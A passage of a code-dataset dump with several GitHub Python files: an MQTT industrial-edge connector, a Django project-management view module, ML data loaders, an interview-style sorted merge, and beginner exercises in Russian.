coming in on write topic, write this data on output topic (data read topic)\n if message.topic == MQTT_DATA_WRITE_TOPIC: \n \n # write input data on dedicated topic (data read topic)\n client.publish(MQTT_DATA_READ_TOPIC, message.payload)\n print(\"Data is written\")\n \n # ignore all other topics\n else:\n return\n \n\n#============================\n# Main function\n#============================\n\nprint(\"\\n\\nStarting custom connector application\")\nprint(\"-------------------------------------\")\n\n# Read config file if existing\ntry:\n print(\"\\n\\n1. Read configuration file\")\n params = read_parameter(CONFIG_FILE)\n MQTT_USER = params['MQTT_USER']\n MQTT_PASSWORD = params['MQTT_PASSWORD']\n MQTT_METADATA_TOPIC = params['MQTT_METADATA_TOPIC']\n MQTT_DATA_READ_TOPIC = params['MQTT_DATA_READ_TOPIC']\n MQTT_DATA_WRITE_TOPIC = params['MQTT_DATA_WRITE_TOPIC']\n MQTT_STATUS_TOPIC = params['MQTT_STATUS_TOPIC']\n\n# If no config file exists, configure with default values\nexcept:\n print(\"> Warning: no config file available! Using default values...\")\n MQTT_USER = 'edge'\n MQTT_PASSWORD = 'edge'\n MQTT_METADATA_TOPIC = 'ie/m/j/simatic/v1/custom1/dp'\n MQTT_DATA_READ_TOPIC = 'ie/d/j/simatic/v1/custom1/dp/r/connection1/collection1'\n MQTT_DATA_WRITE_TOPIC = 'ie/d/j/simatic/v1/custom1/dp/w/connection1/collection1'\n MQTT_STATUS_TOPIC = 'ie/s/j/simatic/v1/custom1/status'\n\nprint(f\"> MQTT_USER = {MQTT_USER}\")\nprint(f\"> MQTT_PASSWORD = {MQTT_PASSWORD}\")\nprint(f\"> MQTT_METADATA_TOPIC = {MQTT_METADATA_TOPIC}\")\nprint(f\"> MQTT_DATA_READ_TOPIC = {MQTT_DATA_READ_TOPIC}\")\nprint(f\"> MQTT_DATA_WRITE_TOPIC = {MQTT_DATA_WRITE_TOPIC}\")\nprint(f\"> MQTT_STATUS_TOPIC = {MQTT_STATUS_TOPIC}\")\n\n\n# Create metadata fix setting)\n# ----------------------------\nprint(\"\\n\\n2. Create metadata\")\n\n# Metadata JSON (fix definition)\nMETADATA_JSON = {\n \"seq\":1,\n \"hashVersion\":123456789,\n\t\"applicationName\":\"Custom Connector V1.0\",\n\t\"statustopic\":MQTT_STATUS_TOPIC,\n \"connections\":\n [\n {\n \"name\":\"Connection_1\",\n \"type\":\"simulated\",\n \"dataPoints\":\n [\n {\n \"name\":\"Collection_1\",\n \"topic\":MQTT_DATA_READ_TOPIC,\n \"pubTopic\":MQTT_DATA_WRITE_TOPIC,\n \"publishType\":\"bulk\",\n \"dataPointDefinitions\":\n [\n {\n \"name\":\"Datapoint_Bool\",\n \"id\":\"101\",\n \"dataType\":\"Bool\"\n },\n {\n \"name\":\"Datapoint_Int\",\n \"id\":\"102\",\n \"dataType\":\"Int\"\n },\n {\n \"name\":\"Datapoint_Real\",\n \"id\":\"103\",\n \"dataType\":\"Real\"\n }\n ]\n }\n ]\n }\n ]\n}\n\nprint(f\"{METADATA_JSON}\")\n\nmeta_json_string = json.dumps(METADATA_JSON)\nprint(f\"{meta_json_string}\")\n\n# Create status data (fix setting)\n# -------------------------------\nprint(\"\\n\\n3. Create status data\")\n\n# Metadata JSON (fix definition)\nSTATUS_JSON = {\n \"seq\":1,\n \"ts\":str(datetime.datetime.now()),\n \"connector\":{\"status\": \"good\"},\n \"connections\":\n [\n {\"name\": \"Connection_1\", \"status\": \"good\"}\n ]\n}\n \nprint(f\"{STATUS_JSON}\")\n\nstatus_json_string = json.dumps(STATUS_JSON)\nprint(f\"{status_json_string}\")\n\n# Configure MQTT client\n# ---------------------\n\nprint(\"\\n\\n4. Configure MQTT client\")\n\nclient = mqtt.Client(client_id = APP_NAME)\n\n#set username and password, must be created it databus configurator\nclient.username_pw_set(MQTT_USER,MQTT_PASSWORD)\n\n#add callback functions\nclient.on_connect = on_connect\nclient.on_disconnect = on_disconnect\nclient.on_message = on_message\n\n# Start client\n# ------------\nprint(\"\\n\\n5. Start MQTT client\")\nclient.connect(MQTT_BROKER)\n\n# subscribe to write data topic and listen, if data is written\nret = client.subscribe(MQTT_DATA_WRITE_TOPIC)\nprint(f\"Subscribed to write topic ({MQTT_DATA_WRITE_TOPIC}) with result = {ret}\")\n\n# MQTT loop\n# ---------\n\n# starts a loop in another thread and lets the main thread continue to do other things\n# loop_stop() is places in function \"on_disconnect\"\nclient.loop_start()\n\n# MAIN thread\n# -----------\nprint(\"Publish metadata and status every 5 seconds\")\n \nwhile True:\n \n # Publish Metadata\n publish_metadata(client)\n \n # Publish Status Data\n publish_statusdata(client)\n \n # Wait for 5 seconds\n time.sleep(5)\n","repo_name":"industrial-edge/common-databus-payload-format","sub_path":"src/custom_connector.py","file_name":"custom_connector.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"17053232666","text":"import hashlib\n\nimport pytest\n\nfrom api import eval_card\n\ncases = [\n ('x + y', b'\\x8c{d\\xb7\\xfb\\xe3\\xd7\\xf76J\\xcc\\xf2`\\xe7W\\x1c'),\n]\n\n\n@pytest.mark.parametrize('func, expected', cases)\ndef test_card(func: str, expected: bytes):\n actual = eval_card('plot_3d', func, None, None)['svg']\n assert hashlib.md5(actual.encode()).digest() == expected\n","repo_name":"eagleoflqj/sympy_beta","sub_path":"kernel/test/test_plot/test_plot_3d.py","file_name":"test_plot_3d.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"70"}
+{"seq_id":"26398370598","text":"if __name__ == '__main__':\n l2 = []\n for _ in range(int(input())):\n l1 = []\n name = input()\n l1.append(name)\n score = float(input())\n l1.append(score)\n l2.append(l1)\n#print(l2)\nl3 = []\nfor i in range(len(l2)):\n l3.append(l2[i][1])\ns = sorted(set(l3))\nn = min(s)\ns.remove(n)\nfor num in s:\n if num == n:\n s.remove(num)\ns.sort()\nl4 = []\nfor item in l2:\n if item[1]== s[0]:\n l4.append(item[0])\n# l4.sort()\nprint(*sorted(l4), sep=\"\\n\")\n#print(*sorted(names_of_second_lowest), sep=\"\\n\")","repo_name":"MuhammadAli7896/All-Python-projects","sub_path":"HackerRank/Nested_Lists.py","file_name":"Nested_Lists.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2369413056","text":"\"\"\"\nProblem:\n\n10.1 Sorted Merge: You are given two sorted arrays, A and B, where A has a large enough buffer at the\nend to hold B. Write a method to merge B into A in sorted order.\n\nHints: #332\n\n--\n\nQuestions:\n\n- Can I assume both arrays always have elements in them?\n\n--\n\nAlgorithm:\n\nA = [1,4,5,7,8,-,-,-,-]\nB = [0,3,4,6]\n\nResult = [0,1,3,4,4,5,6,7,8]\n\n\n-- Using additional memory --\n\nWe want to compare each element of A and B and take the smallest one first.\nAdd it to a new array of the same size of A.\nAt the end, copy the elements back to A.\n\nBeing n the number of elements in array A and m the size of array B:\nTime Complexity: O(n + m)\nSpace Complexity: O(n + m)\n\n-- In-place --\n\nShift all elements of A to the end of the array.\n\n i j\nShifted A = [-,-,-,-,1,4,5,7,8]\n k\nB = [0,3,4,6]\n\nHave two pointers at the beginning of A and one at the first valid element.\nCompare B and A elements, storing them in the beginning of A.\n\nTime Complexity: O(n + m)\nSpace Complexity: O(1)\n\nAlthough, being O(n+m) in time complexity, this algorithm has to shift all\nelements of A to the right. So, it is Theta(2n + m). Can we make it better?\n\n-- Optimizing it --\n\nWe could move the pointers to the last elements of each array and\ncompare them, moving the largest number to the end of the array.\n\nThis saves the time of shifting all elements of A to the right.\n\nPS: The book's solution assumes we are given the positions of the last element in A and B.\nSo, it does not have to iterate over the array to count the elements.\nIf we do not know these positions, we still have to go through all the elements\nof A to know where to position our pointers.\n\n\"\"\"\n\n\ndef sorted_merge(arr1, arr2):\n n_elements = count_elements(arr1)\n shift_elements_right(arr1, n_elements)\n\n i = 0\n j = len(arr1) - n_elements\n k = 0\n\n while k < len(arr2) and j < len(arr1):\n if arr2[k] < arr1[j]:\n arr1[i] = arr2[k]\n k += 1\n else:\n arr1[i] = arr1[j]\n j += 1\n i += 1\n\n while k < len(arr2):\n arr1[i] = arr2[k]\n i += 1\n k += 1\n\n return arr1\n\n\ndef count_elements(arr):\n count = 0\n\n for i in range(len(arr)):\n if arr[i] is not None:\n count += 1\n\n return count\n\n\ndef shift_elements_right(arr, n_elements):\n n = len(arr)\n\n for i in range(n_elements):\n arr[n - 1 - i], arr[n_elements - 1 - i] = (\n arr[n_elements - 1 - i],\n arr[n - 1 - i],\n )\n\n\ndef test(arr1, arr2, expected_answer):\n answer = sorted_merge(arr1, arr2)\n\n if answer != expected_answer:\n raise Exception(\n f\"Answer {answer} is wrong. Expected answer is {expected_answer}\"\n )\n\n\nif __name__ == \"__main__\":\n test(\n [1, None],\n [0],\n [0, 1],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [0, 3, 4, 6],\n [0, 1, 3, 4, 4, 5, 6, 7, 8],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [0, 0, 0, 0],\n [0, 0, 0, 0, 1, 4, 5, 7, 8],\n )\n test(\n [1, 4, 5, 7, 8, None, None, None, None],\n [9, 9, 10, 10],\n [1, 4, 5, 7, 8, 9, 9, 10, 10],\n )\n print(\"All tests passed!\")\n","repo_name":"andrenbrandao/cracking-the-coding-interview","sub_path":"10-sorting-and-searching/1-sorted-merge/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"29915349381","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom main.helpers import ajax_login_required\n# Create your views here.\nfrom django.views import View\nfrom django.views import generic\nfrom django.http import JsonResponse\nfrom django.core.paginator import Paginator\nimport requests\nimport logging\nimport json\n\nlogger = logging.getLogger(__name__)\n\n\nclass Prj_api_index(generic.TemplateView):\n def get(self, request, *args, **kwargs):\n template_name = 'prj/index.html'\n\n r = requests.get('http://prj_api:5002/hello')\n rr = {\n \"result\": r.text\n }\n\n return render(request, template_name, rr)\n\n\n# 프로젝트 목록 조회 화면 호출\ndef prjListSrch(request):\n template_name = 'prj/prjListSrch.html'\n\n return render(request, template_name)\n\n# 개발자 등록 화면\ndef devReg(request):\n template_name = 'prj/devReg.html'\n\n return render(request, template_name)\n\n\n@login_required\ndef retrieve(request):\n headers = {'Content-Type': 'application/json; charset=utf-8'}\n params = {} # get 일때 사용\n data = {\n 'username': 'bulee',\n 'email': 'bulee@infogen.co.kr'\n }\n\n # requests.get(url, params=params)\n res = requests.post('http://prj_api:5002/retrieve', headers=headers,\n json=data) # data가 다층 구조일 땐 json.dumps(data) 사용\n\n if res.status_code == requests.codes.ok:\n retVal = res.json()\n retVal['status'] = 'ok'\n else:\n retVal = {\n 'status': 'fail'\n }\n logger.debug(retVal);\n return JsonResponse(retVal)\n\n\ndef prjReg(request):\n template_name = 'prj/prjReg.html'\n\n return render(request, template_name)\n\n\n# 프로젝트 정보 조회\ndef retrievePrjInfo(request):\n param = json.loads(request.GET['param'])\n\n params = {\n 'prj_cd': param['prj_cd'],\n }\n\n r = requests.get('http://prj_api:5002/retrievePrjInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 요구 스킬 조회\ndef retrieveReqSkil(request):\n param = json.loads(request.GET['param'])\n\n params = {\n 'prj_cd': param['prj_cd'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveReqSkil', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 등록 스킬명 조회\ndef retrieveSkilName(request):\n param = json.loads(request.GET['param'])\n\n params = {\n\n }\n\n r = requests.get('http://prj_api:5002/retrieveSkilName', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 저장\n@ajax_login_required\ndef prjSave(request):\n userId = str(request.user)\n param = json.loads(request.POST['param'])\n\n datas = {\n 'userId': userId\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/prjSave', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트 삭제\n@ajax_login_required\ndef prjDelete(request):\n param = json.loads(request.POST['param'])\n\n datas = {\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/prjDelete', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json())\n\n\n# 프로젝트별투입현황관리 프로젝트 상세정보\ndef retrievePrjDetlInfo(request):\n param = json.loads(request.GET['param'])\n logger.info(param)\n logger.info(\"프로젝트별투입현황관리 프로젝트 상세정보\")\n params = {\n 'prjCd': param['prjCd']\n }\n r = requests.get('http://prj_api:5002/retrievePrjDetlInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 화면\ndef prjInpuMgmt(request):\n template_name = 'prj/prjInpuMgmt.html'\n\n return render(request, template_name)\n\n\n# 프로젝트별투입현황관리 조회\ndef prjInpuSearch(request):\n param = json.loads(request.GET['param'])\n logger.info(\"prjInpuSearch : skil/views.py\")\n datas = {\n 'prjCd': param['prjCd']\n }\n r = requests.get('http://prj_api:5002/prjInpuSearch', params=datas)\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 삭제\ndef prjInpuDelete(request):\n param = json.loads(request.POST['param'])\n logger.info(param)\n logger.info(\"prjInpuDelete : skil/views.py\")\n datas = {\n 'prjCd': param['PRJ_CD'],\n 'empNo': param['EMP_NO'],\n }\n\n logger.info('request.post : ' + request.POST['param'])\n\n r = requests.post('http://prj_api:5002/prjInpuDelete', data=datas)\n return JsonResponse(r.json(), safe=False)\n\n\n# 프로젝트별투입현황관리 저장\ndef prjInpuSave(request):\n param = json.loads(request.POST['param'])\n userId = str(request.user)\n logger.info(param)\n for data in param:\n if '__created__' in data and data['__created__']:\n logger.info(\"__created__\")\n datas = {\n 'empNo': data['EMP_NO'],\n 'prjCd': data['PRJ_CD'],\n 'slinGrd': data['SLIN_GRD'],\n 'inpuStrtDay': data['INPU_STRT_DAY'],\n 'inpuEndDay': data['INPU_END_DAY'],\n 'cntcStrtDay': data['CNTC_STRT_DAY'],\n 'cntcEndDay': data['CNTC_END_DAY'],\n 'crgeJob': data['CRGE_JOB'],\n 'rmks': data['RMKS'],\n 'state': 'created',\n 'userId' : userId\n }\n else:\n logger.info(\"modified\")\n datas = {\n 'empNo': data['EMP_NO'],\n 'prjCd': data['PRJ_CD'],\n 'slinGrd': data['SLIN_GRD'],\n 'inpuStrtDay': data['INPU_STRT_DAY'],\n 'inpuEndDay': data['INPU_END_DAY'],\n 'cntcStrtDay': data['CNTC_STRT_DAY'],\n 'cntcEndDay': data['CNTC_END_DAY'],\n 'crgeJob': data['CRGE_JOB'],\n 'rmks': data['RMKS'],\n 'state': 'modified',\n 'userId': userId\n }\n r = requests.post('http://prj_api:5002/prjInpuSave', data=datas)\n return JsonResponse(r.json())\n\n\n# 프로젝트 목록 조회\ndef prjListSearch(request):\n logger.info(\"prjListSearch : prj/views.py\")\n param = json.loads(request.GET['param'])\n logger.info(param)\n\n datas = {\n 'deptDiv': param['deptDiv'],\n 'skilDiv': param['skilDiv']\n }\n\n logger.info(datas)\n r = requests.get('http://prj_api:5002/prjListSearch', params=datas)\n\n paginator = Paginator(r.json(), 10)\n logger.info(\"----------------\")\n logger.info(paginator)\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n\n result = paginator.get_page(param['page'])\n\n logger.info(result)\n\n data = {\n 'list': list(result.object_list),\n 'total_records': paginator.count,\n 'total_pages': paginator.num_pages,\n 'page': result.number,\n 'has_next': result.has_next(),\n 'has_prev': result.has_previous()\n }\n\n # return JsonResponse(r.json())\n return JsonResponse(data)\n\n#부서 코드 조회\ndef getDeptCd(request):\n param = json.loads(request.GET['param'])\n logger.info('===============================')\n logger.info(param)\n logger.info('===============================')\n datas = {}\n\n r = requests.get('http://prj_api:5002/getDeptCd', params=datas)\n\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n logger.info(r.json())\n logger.info(json.loads(r.text))\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 조회\ndef retrieveDevInfo(request):\n param = json.loads(request.GET['param'])\n logger.info(param)\n\n params = {\n 'emp_no': param['emp_no'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveDevInfo', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 저장\ndef devSave(request):\n userId = str(request.user)\n param = json.loads(request.POST['param'])\n\n datas = {\n 'userId': userId\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n logger.info(datas)\n r = requests.post('http://prj_api:5002/devSave', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 삭제\ndef devDelete(request):\n param = json.loads(request.POST['param'])\n\n datas = {\n }\n\n for row in param:\n datas.setdefault(row, param[row])\n\n r = requests.post('http://prj_api:5002/devDelete', data=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json())\n\n#공통 코드 조회\ndef retrieveCmmCd(request):\n param = json.loads(request.GET['param'])\n logger.info('param')\n logger.info(param)\n\n params = {\n 'grp_id': param['grp_id'],\n }\n\n r = requests.get('http://prj_api:5002/retrieveCmmCd', params=params)\n logger.info(r)\n logger.info(r.text)\n logger.info(r.json())\n\n return JsonResponse(r.json(), safe=False)\n\n# 개발자 정보 조회\ndef devMgmt(request):\n template_name = 'prj/devMgmt.html'\n\n return render(request, template_name)\n\ndef devMgmtSearch(request):\n\n param = json.loads(request.GET['param'])\n logger.info(\"devMgmtSearch : prj/views.py\")\n datas = {\n 'devpBlco': param['devpBlco'],\n 'empName': param['empName'],\n 'devpDivsCd': param['devpDivsCd']\n }\n\n logger.info(datas)\n r = requests.get('http://prj_api:5002/devMgmtSearch', params=datas)\n logger.info(r)\n logger.info(r.text)\n logger.info(\"----------------\")\n logger.info(r.json())\n logger.info(json.loads(r.text))\n # return JsonResponse(r.json())\n return JsonResponse(r.json(), safe=False)","repo_name":"smilebulee/infogen_ims","sub_path":"ifg_front/prj_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10254,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"17201290341","text":"import cv2\nimport os\nimport numpy as np\nimport pathlib\nfrom itertools import chain\nfrom sklearn.model_selection import train_test_split\n\n#text\nimport re\nfrom nltk import word_tokenize\nimport gensim\nimport embedding_utils\n\nimage_label_list = [] #list of category names to avoid confusion\ntext_label_list = [] #list of category names to avoid confusion\nspectogram_label_list = []\n\ndef get_spectogram_data(image_size=224):\n number_of_image_parts = 10\n spectogram_path = './data/spectrogram'\n total_image_file = 0\n\n for root, dirs, files in os.walk(spectogram_path):\n for file in files:\n total_image_file+=1\n one_image = cv2.imread(root + '/' + file)\n img_height, img_width = one_image.shape[:2]\n\n target_list = []\n #x is a np array with shape (height, height, 3), because the aspect ratio is kept the same\n x = np.zeros(shape=(total_image_file*number_of_image_parts, \\\n image_size, image_size, 3), dtype=np.uint8)\n\n category = os.listdir(spectogram_path)\n for i, cat in enumerate(category):\n spec_name_list = os.listdir(spectogram_path + '/{}'.format(cat))\n spectogram_label_list.append(cat)\n for spectogram_name in spec_name_list:\n spectogram_full_path = '%s/%s/%s' %(spectogram_path, cat, spectogram_name)\n\n image = cv2.imread(spectogram_full_path)\n for j in range(number_of_image_parts):\n hm_width = img_width//10 #how much pixel width per part\n start_pixel = j*hm_width\n end_pixel = (j+1)*hm_width\n #crop = im[y1:y2, x1:x2]\n #(x1, y1) = top, left; (x2, y2) = bottom right\n cropped_image = image[:, start_pixel:end_pixel]\n\n resized_image = cv2.resize(cropped_image, (image_size, image_size))\n x[i] = resized_image\n\n #create the categorical target list\n #e.g. Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n y = np.zeros((len(target_list), len(spectogram_label_list)), dtype=np.int32)\n #===turn categorical target into one hot===\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n\ndef get_image_data(image_size=224):\n #todo: instead of appending the data into lists, just create np zeros and fill it.\n image_path = './data/images'\n total_image_file = 0\n count = 0\n\n #count the total image file in the /data/image folder\n for root, dirs, files in os.walk(image_path):\n for file in files:\n total_image_file+=1\n\n x = np.zeros((total_image_file, image_size, image_size, 3), dtype=np.uint8)\n target_list = []\n\n #===reading images into image_list array===\n category = os.listdir(image_path)\n for i, cat in enumerate(category):\n img_list = os.listdir(image_path + '/{}'.format(cat))\n image_label_list.append(cat)\n for image_name in img_list:\n #insert the image into np array\n x[count, :] = cv2.resize(cv2.imread('%s/%s/%s' %(image_path, cat, image_name)),\\\n (image_size, image_size))\n count+=1\n\n #create the categorical target list\n #e.g. Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n #===create one hot vector===\n y = np.zeros((total_image_file, len(image_label_list)), dtype=np.int32)\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n\ndef get_text_data():\n max_sequence_length = 10 #maximum sequence length of RNN\n dim_size = 100 #dimension of embedding\n\n text_path = './data/text'\n\n sentence_list = []\n target_list = []\n\n #===read text into text_list array===\n category = os.listdir(text_path)\n for i, cat in enumerate(category):\n txt_list = os.listdir(text_path + '/{}'.format(cat))\n text_label_list.append(cat)\n for text_name in txt_list:\n text_full_dir = '%s/%s/%s' %(text_path, cat, text_name)\n with open(text_full_dir, 'r') as f:\n #preprocess: splitting the text into list, separated by \\n\n texts = f.readlines()\n for text in texts:\n sentence = re.sub('\\n', '', text)\n tokens = word_tokenize(sentence)\n\n #append the sentence into a list\n sentence_list.append(tokens)\n\n #create the categorical target list\n #e.g. Batak: 1, Betawi: 2, Toraja: 3, ...\n target_list.append(i+1)\n\n #===get embedding model===\n #instantiate the class\n embedding = embedding_utils.Embedding(sentence_list)\n model = embedding.get_embedding_model()\n\n #===representing words with word vectors===\n x = np.zeros((len(sentence_list), max_sequence_length, dim_size))\n y = np.zeros((len(sentence_list), len(text_label_list)), dtype=np.int32)\n\n \"\"\"\n fill the vectors into the np array, if the sentence is longer than the maximum\n sequence length, index error will be raised, and ignored (pass). If the sentence is more\n than max seq length, then only the first len(max seq len) words are turned into vectors\n \"\"\"\n for index, sentence in enumerate(sentence_list):\n try:\n for token_index, token in enumerate(sentence):\n x[index, token_index, :] = model[token]\n except:\n pass\n\n #===turn categorical target into one hot===\n for i, target in enumerate(target_list):\n #from the zero array, set the value of the corresponding index to 1\n y[i][target-1] = 1\n\n #===splitting data===\n #train/valid/test = 70/15/15\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n x_valid, x_test, y_valid, y_test = train_test_split(x_test, y_test, test_size=0.5, random_state=42)\n return x_train, x_valid, x_test, y_train, y_valid, y_test\n","repo_name":"vinliao/culture-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21218369562","text":"#1\r\ndef message(i):\r\n print(f\"Привет {i}\\n\")\r\nname=input(\"Введите имя: \")\r\nmessage(name)\r\n\r\n#2\r\ndef func(t, r):\r\n return t\r\nitem = input(\"Введите текст: \")\r\nn = int(input(\"Количество текста: \"))\r\na = func(item, n)\r\nfor i in range (n):\r\n print(a)\r\nprint(\"\\n\")\r\n\r\n#3\r\ndef func(num1,num2):\r\n if num1 > num2:\r\n z = f\"{num1} > {num2}\"\r\n elif num2 > num1:\r\n z = f\"{num2} > {num1}\"\r\n else:\r\n z = \"equal\"\r\n return z\r\nnum1 = int(input(\"Первое число: \"))\r\nnum2 = int(input(\"Второе число: \"))\r\ny = func(num1,num2)\r\nprint(y)\r\nprint(\"\\n\")\r\n\r\n#4\r\ndef func(num1,num2,num3):\r\n z = max(num1,num2,num3)\r\n return z\r\nnum1 = int(input(\"Первое число: \"))\r\nnum2 = int(input(\"Второе число: \"))\r\nnum3 = int(input(\"Третье число: \"))\r\ny = func(num1,num2,num3)\r\nprint(f\"Наибольшое число {y}\\n\")\r\n\r\n\r\n#5\r\ndef func(num1,num2,num3):\r\n if num1 + num2 > num3 and num1 + num3 > num2 and num2 + num3 > num1:\r\n z = \"Треугольник существует\\n\"\r\n else:\r\n z = \"Треугольник не существует!\\n\"\r\n return z\r\nnum1 = int(input(\"Первая сторона: \"))\r\nnum2 = int(input(\"Вторая сторона: \"))\r\nnum3 = int(input(\"Третья сторона: \"))\r\ny = func(num1,num2,num3)\r\nprint(y)\r\n\r\n#6\r\ndef func(word1,word2):\r\n z = word1 + \"\" + word2\r\n return z\r\nword1 = input(\"Первое слово: \")\r\nword2 = input(\"Второе слово: \")\r\ny = func(word1,word2)\r\nprint(f\"{y}\\n\")\r\n\r\n#7\r\ndef func(op1,op2,op3,x,i=1):\r\n if op3 == \"+\": \r\n x = op1 + op2\r\n elif op3 == \"-\": \r\n x = op1 - op2\r\n elif op3 == \"*\": \r\n x = op1 * op2\r\n elif op3 == \"/\": \r\n x = op1 / op2\r\n else:\r\n x = \"Unknown operation\"\r\n return x\r\n return f\"{x:.{i}f}\"\r\nop1 = int(input(\"Первое число: \"))\r\nop2 = int(input(\"Второе число: \"))\r\nop3 = (input(\"Операция (+, -, *, /): \"))\r\nx = 0\r\ny = func(op1,op2,op3,x,2)\r\nprint(f\"{y}\\n\")\r\n\r\n#8\r\ndef func(tag,text):\r\n z = f\"<{tag}>{text}<{tag}>\\n\"\r\n return z\r\ntag = input(\"Тэг: \")\r\ntext = input(\"Текст: \")\r\ny = func(tag,text)\r\nprint(y)\r\n\r\n#9\r\ndef func(x):\r\n if x<=2 or x==12:\r\n m = \"Winter\\n\"\r\n elif x>2 and x <=5:\r\n m = \"Spring\\n\"\r\n elif x>5 and x <=8:\r\n m = \"Summer\\n\"\r\n elif x>8 and x <=11:\r\n m = \"Autumn\\n\"\r\n else:\r\n m = \"Месяц не найден\\n\"\r\n return m\r\nx = int(input(\"Номер месяца: \"))\r\ny = func(x)\r\nprint(y)\r\n\r\n#10\r\ndef func(n):\r\n for i in n:\r\n print(\"*\" * i)\r\nfunc([2,7,1,4,2,3,9,3] )\r\nprint(\"\\n\")\r\n\r\n#11\r\ndef num(a):\r\n if a % 2 == 0:\r\n print(\"Число парное\\n\")\r\n else:\r\n print(\"Число непарное\\n\")\r\na = int(input(\"Введите число: \"))\r\nnum(a)\r\n\r\n#12\r\ndef func(numbers):\r\n x = [numbers[0], numbers[-1]]\r\n print(x)\r\nnumbers = [5, 16, 72, 29, 11, 217, 112]\r\nfunc(numbers)\r\nprint(\"\\n\")\r\n\r\n#13\r\ndef fact(x, i = a, z = a) :\r\n while i <= x:\r\n i *= z\r\n z += a\r\n print(i)\r\nx = int(input(\"Введите факториал: \"))\r\nfact(x)\r\nprint(\"\\n\")\r\n\r\n#14\r\nimport math\r\ndef triangle(side1, side2, side3):\r\n p = (side1 + side2 + side3)/2\r\n print(math.sqrt(p*(p-side1)*(p-side2)*(p-side3)))\r\n \r\ndef check_triangle(side1, side2, side3):\r\n if side1 + side2 > side3 and side1 + side3 > side2 and side2 + side3 > side1:\r\n return True\r\n else:\r\n return False\r\ndef circle(r):\r\n print(math.pi * math.pow(r, 2))\r\ndef rectangle(a, b):\r\n print(a*b)\r\ndef check_the_figure(name):\r\n if name == \"треугольник\" :\r\n side1 = int(input(\"1 сторона: \"))\r\n side2 = int(input(\"2 сторона: \"))\r\n side3 = int(input(\"3 сторона: \"))\r\n if check_triangle(side1, side2, side3): \r\n triangle(side1, side2, side3)\r\n else :\r\n print(\"Треугольник не может существовать\")\r\n elif name == \"круг\" :\r\n r = int(input(\"Радиус круга: \"))\r\n circle(r)\r\n elif name == \"прямоугольник\" :\r\n a = int(input(\"1 сторона прямоугольника: \"))\r\n b = int(input(\"2 сторона прямоугольника: \"))\r\n rectangle(a, b)\r\ncheck_the_figure(input(\"Введите название фигуры(треугольник,круг,прямоугольник): \"))\r\n","repo_name":"Aquilez-brinko/Kfund-Python","sub_path":"16practical.py","file_name":"16practical.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
